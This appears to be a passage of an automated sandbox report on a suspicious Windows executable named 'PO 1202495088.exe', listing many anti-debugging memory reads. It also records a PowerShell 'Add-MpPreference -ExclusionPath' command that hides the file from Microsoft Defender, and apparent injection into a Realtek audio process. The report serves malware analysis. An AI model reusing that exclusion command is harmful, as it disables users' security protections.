                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E43D0 mov ecx, dword ptr fs:[00000030h]4_2_013E43D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B63CB mov eax, dword ptr fs:[00000030h]4_2_013B63CB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C3B0 mov eax, dword ptr fs:[00000030h]4_2_0142C3B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE3C0 mov eax, dword ptr fs:[00000030h]4_2_013AE3C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE3C0 mov eax, dword ptr fs:[00000030h]4_2_013AE3C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE3C0 mov eax, dword ptr fs:[00000030h]4_2_013AE3C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AC3C7 mov eax, dword ptr fs:[00000030h]4_2_013AC3C7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014543BA mov eax, dword ptr fs:[00000030h]4_2_014543BA
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014543BA mov eax, dword ptr fs:[00000030h]4_2_014543BA
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D0230 mov ecx, dword ptr fs:[00000030h]4_2_013D0230
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA22B mov eax, dword ptr fs:[00000030h]4_2_013EA22B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA22B mov eax, dword ptr fs:[00000030h]4_2_013EA22B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA22B mov eax, dword ptr fs:[00000030h]4_2_013EA22B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A821B mov eax, dword ptr fs:[00000030h]4_2_013A821B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AA200 mov eax, dword ptr fs:[00000030h]4_2_013AA200
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430227 mov eax, dword ptr fs:[00000030h]4_2_01430227
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430227 mov eax, dword ptr fs:[00000030h]4_2_01430227
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430227 mov eax, dword ptr fs:[00000030h]4_2_01430227
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AC2B0 mov ecx, dword ptr fs:[00000030h]4_2_013AC2B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D42AF mov eax, dword ptr fs:[00000030h]4_2_013D42AF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D42AF mov eax, dword ptr fs:[00000030h]4_2_013D42AF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E289 mov eax, dword ptr fs:[00000030h]4_2_0142E289
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B82E0 mov eax, dword ptr fs:[00000030h]4_2_013B82E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B82E0 mov eax, dword ptr fs:[00000030h]4_2_013B82E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B82E0 mov eax, dword ptr fs:[00000030h]4_2_013B82E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B82E0 mov eax, dword ptr fs:[00000030h]4_2_013B82E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2539 mov eax, dword ptr fs:[00000030h]4_2_013F2539
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01446550 mov eax, dword ptr fs:[00000030h]4_2_01446550
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147A553 mov eax, dword ptr fs:[00000030h]4_2_0147A553
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC50D mov eax, dword ptr fs:[00000030h]4_2_013EC50D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC50D mov eax, dword ptr fs:[00000030h]4_2_013EC50D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B2500 mov eax, dword ptr fs:[00000030h]4_2_013B2500
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CC560 mov eax, dword ptr fs:[00000030h]4_2_013CC560
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C51D mov eax, dword ptr fs:[00000030h]4_2_0143C51D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B254C mov eax, dword ptr fs:[00000030h]4_2_013B254C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CE547 mov eax, dword ptr fs:[00000030h]4_2_013CE547
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E6540 mov eax, dword ptr fs:[00000030h]4_2_013E6540
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E8540 mov eax, dword ptr fs:[00000030h]4_2_013E8540
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014305C6 mov eax, dword ptr fs:[00000030h]4_2_014305C6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B45B0 mov eax, dword ptr fs:[00000030h]4_2_013B45B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B45B0 mov eax, dword ptr fs:[00000030h]4_2_013B45B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145E5E0 mov eax, dword ptr fs:[00000030h]4_2_0145E5E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E2594 mov eax, dword ptr fs:[00000030h]4_2_013E2594
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA580 mov eax, dword ptr fs:[00000030h]4_2_013EA580
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA580 mov eax, dword ptr fs:[00000030h]4_2_013EA580
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C5FC mov eax, dword ptr fs:[00000030h]4_2_0143C5FC
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E588 mov eax, dword ptr fs:[00000030h]4_2_0142E588
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E588 mov eax, dword ptr fs:[00000030h]4_2_0142E588
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C592 mov eax, dword ptr fs:[00000030h]4_2_0143C592
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA5E7 mov ebx, dword ptr fs:[00000030h]4_2_013EA5E7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA5E7 mov eax, dword ptr fs:[00000030h]4_2_013EA5E7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014385AA mov eax, dword ptr fs:[00000030h]4_2_014385AA
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E65D0 mov eax, dword ptr fs:[00000030h]4_2_013E65D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC5C6 mov eax, dword ptr fs:[00000030h]4_2_013EC5C6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430443 mov eax, dword ptr fs:[00000030h]4_2_01430443
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E461 mov eax, dword ptr fs:[00000030h]4_2_0143E461
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147A464 mov eax, dword ptr fs:[00000030h]4_2_0147A464
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A640D mov eax, dword ptr fs:[00000030h]4_2_013A640D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01446400 mov eax, dword ptr fs:[00000030h]4_2_01446400
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01446400 mov eax, dword ptr fs:[00000030h]4_2_01446400
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8470 mov eax, dword ptr fs:[00000030h]4_2_013B8470
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8470 mov eax, dword ptr fs:[00000030h]4_2_013B8470
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE4BC mov eax, dword ptr fs:[00000030h]4_2_013EE4BC
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E44A8 mov eax, dword ptr fs:[00000030h]4_2_013E44A8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B24A2 mov eax, dword ptr fs:[00000030h]4_2_013B24A2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B24A2 mov ecx, dword ptr fs:[00000030h]4_2_013B24A2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E4F2 mov eax, dword ptr fs:[00000030h]4_2_0143E4F2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E4F2 mov eax, dword ptr fs:[00000030h]4_2_0143E4F2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E648A mov eax, dword ptr fs:[00000030h]4_2_013E648A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E648A mov eax, dword ptr fs:[00000030h]4_2_013E648A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E648A mov eax, dword ptr fs:[00000030h]4_2_013E648A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014544F8 mov eax, dword ptr fs:[00000030h]4_2_014544F8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014544F8 mov eax, dword ptr fs:[00000030h]4_2_014544F8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0485 mov ecx, dword ptr fs:[00000030h]4_2_013B0485
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B64F0 mov eax, dword ptr fs:[00000030h]4_2_013B64F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA4F0 mov eax, dword ptr fs:[00000030h]4_2_013EA4F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA4F0 mov eax, dword ptr fs:[00000030h]4_2_013EA4F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE4EF mov eax, dword ptr fs:[00000030h]4_2_013EE4EF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE4EF mov eax, dword ptr fs:[00000030h]4_2_013EE4EF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C490 mov eax, dword ptr fs:[00000030h]4_2_0143C490
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D44D1 mov eax, dword ptr fs:[00000030h]4_2_013D44D1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D44D1 mov eax, dword ptr fs:[00000030h]4_2_013D44D1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014484BB mov eax, dword ptr fs:[00000030h]4_2_014484BB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145E750 mov eax, dword ptr fs:[00000030h]4_2_0145E750
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B471B mov eax, dword ptr fs:[00000030h]4_2_013B471B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B471B mov eax, dword ptr fs:[00000030h]4_2_013B471B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D270D mov eax, dword ptr fs:[00000030h]4_2_013D270D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D270D mov eax, dword ptr fs:[00000030h]4_2_013D270D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D270D mov eax, dword ptr fs:[00000030h]4_2_013D270D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B4779 mov eax, dword ptr fs:[00000030h]4_2_013B4779
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B4779 mov eax, dword ptr fs:[00000030h]4_2_013B4779
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0774 mov eax, dword ptr fs:[00000030h]4_2_013E0774
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C2760 mov ecx, dword ptr fs:[00000030h]4_2_013C2760
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov ecx, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA750 mov eax, dword ptr fs:[00000030h]4_2_013EA750
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01464730 mov eax, dword ptr fs:[00000030h]4_2_01464730
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01464730 mov eax, dword ptr fs:[00000030h]4_2_01464730
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B07A7 mov eax, dword ptr fs:[00000030h]4_2_013B07A7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE7E0 mov eax, dword ptr fs:[00000030h]4_2_013DE7E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov ecx, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0144C7B0 mov eax, dword ptr fs:[00000030h]4_2_0144C7B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0144C7B0 mov eax, dword ptr fs:[00000030h]4_2_0144C7B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0630 mov eax, dword ptr fs:[00000030h]4_2_013B0630
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0630 mov eax, dword ptr fs:[00000030h]4_2_013E0630
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC620 mov eax, dword ptr fs:[00000030h]4_2_013EC620
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E660 mov eax, dword ptr fs:[00000030h]4_2_0143E660
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484600 mov eax, dword ptr fs:[00000030h]4_2_01484600
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0670 mov eax, dword ptr fs:[00000030h]4_2_013B0670
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2670 mov eax, dword ptr fs:[00000030h]4_2_013F2670
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2670 mov eax, dword ptr fs:[00000030h]4_2_013F2670
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E666D mov esi, dword ptr fs:[00000030h]4_2_013E666D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E666D mov eax, dword ptr fs:[00000030h]4_2_013E666D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E666D mov eax, dword ptr fs:[00000030h]4_2_013E666D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E265C mov eax, dword ptr fs:[00000030h]4_2_013E265C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E265C mov ecx, dword ptr fs:[00000030h]4_2_013E265C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E265C mov eax, dword ptr fs:[00000030h]4_2_013E265C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01438633 mov esi, dword ptr fs:[00000030h]4_2_01438633
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01438633 mov eax, dword ptr fs:[00000030h]4_2_01438633
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01438633 mov eax, dword ptr fs:[00000030h]4_2_01438633
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC640 mov eax, dword ptr fs:[00000030h]4_2_013EC640
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC640 mov eax, dword ptr fs:[00000030h]4_2_013EC640
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147A6C0 mov eax, dword ptr fs:[00000030h]4_2_0147A6C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014586C2 mov eax, dword ptr fs:[00000030h]4_2_014586C2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014646CB mov eax, dword ptr fs:[00000030h]4_2_014646CB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014646CB mov eax, dword ptr fs:[00000030h]4_2_014646CB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014466D0 mov eax, dword ptr fs:[00000030h]4_2_014466D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014466D0 mov eax, dword ptr fs:[00000030h]4_2_014466D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145E6D0 mov eax, dword ptr fs:[00000030h]4_2_0145E6D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8690 mov eax, dword ptr fs:[00000030h]4_2_013B8690
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C6F2 mov eax, dword ptr fs:[00000030h]4_2_0142C6F2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C6F2 mov eax, dword ptr fs:[00000030h]4_2_0142C6F2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BC6E0 mov eax, dword ptr fs:[00000030h]4_2_013BC6E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D66E0 mov eax, dword ptr fs:[00000030h]4_2_013D66E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D66E0 mov eax, dword ptr fs:[00000030h]4_2_013D66E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014786A8 mov eax, dword ptr fs:[00000030h]4_2_014786A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\PO 1202495088.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6A82C1Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x5F9B424Jump to behavior
